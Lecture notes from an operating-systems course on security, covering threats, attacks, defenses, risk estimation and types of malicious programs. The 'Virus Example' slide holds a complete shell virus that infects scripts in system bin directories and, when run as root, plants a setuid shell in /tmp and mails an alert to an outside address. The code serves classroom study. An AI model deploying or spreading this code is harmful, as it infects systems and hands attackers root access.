Operating Systems Lecture Notes

2014 December 4 • Security

---

Outline

• The security problem: threat, attack, defend.
• Program, system, and network threats.
• Security tools.
  • User authentication and authorization.
  • Cryptography
• Implementing security.
• Computer-security classifications.

What is Security?

• Security is a game with lots of different rules.
  • Make sure you understand the rules.
• A system is secure if resources are used as intended.
  • The system gets to decide intended resource use.
  • External matters can (usually do) influence the decision.
• Unintended resource use is a security violation.

The Security Game

• The security game has three phases:
  1. The system offers resources containing threats: weaknesses that can violate security.
  2. The intruder attacks by exploiting resource threats.
  3. The system defends by somehow ameliorating threats and attacks.
• But really: the security game is like Calvinball.

Security Threats

• Security threats are weaknesses inherent in the system.
  • These could be by (lack of) design, or by circumstance.
  • Examples: buffer-overflow, or timing threats.
• The set of security threads is not static; it evolves over time.
  • Old threats are handled, new threats are discovered.

Security Attacks

• Data attacks
  • On confidentiality: unintended data reads.
  • On integrity: unintended data writes.
  • On availability: unintended data destruction.
• Service attacks
  • Theft: unintended resource use.
  • Denial: preventing intended resource use.

Security Defenses

• Two main defenses against security attacks are
  1. Reduce security threats (the attack surface).
     • Increase the cost of attacking.
  2. Reduce the value of being attacked.
• Example:
  • Store passwords in indirect databases.
  • Don’t store passwords in plain text.

Security Defense Architectures

• Security is not an add-on.
  • It must be designed in from the start.
  • This tends to make security either inflexible or expensive or both.
• Security architectures contentiously vary with requirements, but
  • Simplicity: easy to spot and fix threats.
  • Layering: successful attacks lead to the chance for another attack.

Security Defense Concepts

• Important security defense concepts include:
  • Identity: who or what an agent is.
    • A data entry-clerk, jblow@monmouth.edu
  • Authentication: the veracity of an agent’s identity.
    • A password, some biometrics.
  • Authorization: what an authenticated agent can do.
    • Only registrars add seats to a class.

Thinking About Security

• Security is a binary value: a system is either secure or it’s not.
  • And almost all systems are (perhaps latently) not secure under their own rules.
  • It does not make sense to say “the system is 80% secure” with respect to security.
• Exploiting “just one threat” is often enough to run wild through the system.

Thinking About Risk

• It’s better to think about security risks: the likelihood that an attack causes a certain amount of damage.
  • This is probabilistic thinking.
• Estimate
  • the probability of successful attack P_a, and
  • the amount of damaged caused E_d
• to determine the expected loss P_aE_d.

Risk Example

• Given
  • A one-in-a-million attack (P_a = 10^-6)
  • which, if successful, incurs a million-dollars in damage (E_d = 10⁶)
• has an expected loss of P_aE_d = 10^-610⁶ = 1.
• The quality of the result is directly proportional to the quality of the estimates.

Using Risk

• Expected loss risk estimates can be used to bound defense costs.
  • Spending more than a dollar to defend against a one-in-a-million, million dollar risk may not be wise.
    • This suggests insurance against loss.
• Two defenses suggested by risk analysis are
  • reduce the attack probability, and
  • reduce the cost of a successful attack.

Attack Categories

• There are several general attack categories:
  • Physical: crowbars and bolt cutters.
  • Social: attack the system at its weakest link.
  • Programs: code designed or modified to violate security.
  • Combinatorics: manipulating the system into unsavory states.
  • Remote: any of the above (except maybe physical) at a distance.

Physical Example.

Physical Example..

Social Example

Program Attacks

• Programs written or changed to attack the system.
• A veritable bestiary:
  • Trojan horse: A dual-behavior program, overtly good and covertly evil.
  • Virus: A malevolent code fragment that infects other code.
  • Worm: A self-propelled virus.

Virus Example

#!/bin/sh
(for i in * /bin/* /usr/bin/* /u*/*/bin/* ; do 
   if sed 1q $i | grep '^#![:space:]*/bin/sh'
   then if grep '^# mark$' $i ;  then:
   else trap "rm -f /tmp/x$$" 0 1 2 13 15
     sed 1q $i >/tmp/x$$
     sed '1d
	     /^# mark$/q' $0 >>/tmp/x$$
     sed 1d $i >>/tmp/x$$
     cp /tmp/x$$ $i
     fi
   fi
 done
 if ls -l /tmp/x$$ | grep root ; then 
   rm /tmp/gift
   cp /bin/sh /tmp/gift
   chmod 4777 /tmp/gift
   echo gift | mail joe@chicago
 fi
 rm /tmp/x$$
) >/dev/null 2>/dev/null &
# mark

Combinatorics Example

Summary

• Security is a game; make sure you understand the rules.
• Security involves threats, attacks, and defenses.
• Proper security analysis requires probabilistic thinking.

References

• Reflections on Trusting Trust by Ken Thompson in the Communications of the ACM, August, 1984.
• Practical Threat Analysis and Risk Management by Mick Bauer in Linux Journal, January, 2002.
• Viral Attacks On UNIX System Security by Tom Duff, Technical Memorandum 11273-880728-02TMS, AT&T Bell Labs, August 1987.

---

This page last modified on 2012 January 30.